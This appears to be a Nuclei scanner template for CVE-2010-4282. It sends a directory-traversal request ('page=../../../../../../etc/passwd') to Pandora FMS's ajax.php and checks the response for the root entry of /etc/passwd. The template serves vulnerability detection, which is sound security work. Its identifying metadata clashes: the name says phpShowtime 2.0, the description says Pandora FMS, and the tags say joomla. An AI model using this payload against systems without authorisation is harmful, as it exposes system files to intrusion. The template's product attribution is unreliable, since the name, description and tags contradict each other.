id: CVE-2010-4282

info:
  name: phpShowtime 2.0 - Directory Traversal
  author: daffainfo
  severity: high
  description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
  reference:
    - https://www.exploit-db.com/exploits/15643
    - https://www.cvedetails.com/cve/CVE-2010-4282
    - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
    - http://www.exploit-db.com/exploits/15643
  remediation: Upgrade to a supported version.
  classification:
    cve-id: CVE-2010-4282
  tags: cve,cve2010,lfi,joomla,phpshowtime

requests:
  - method: GET
    path:
      - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/02/17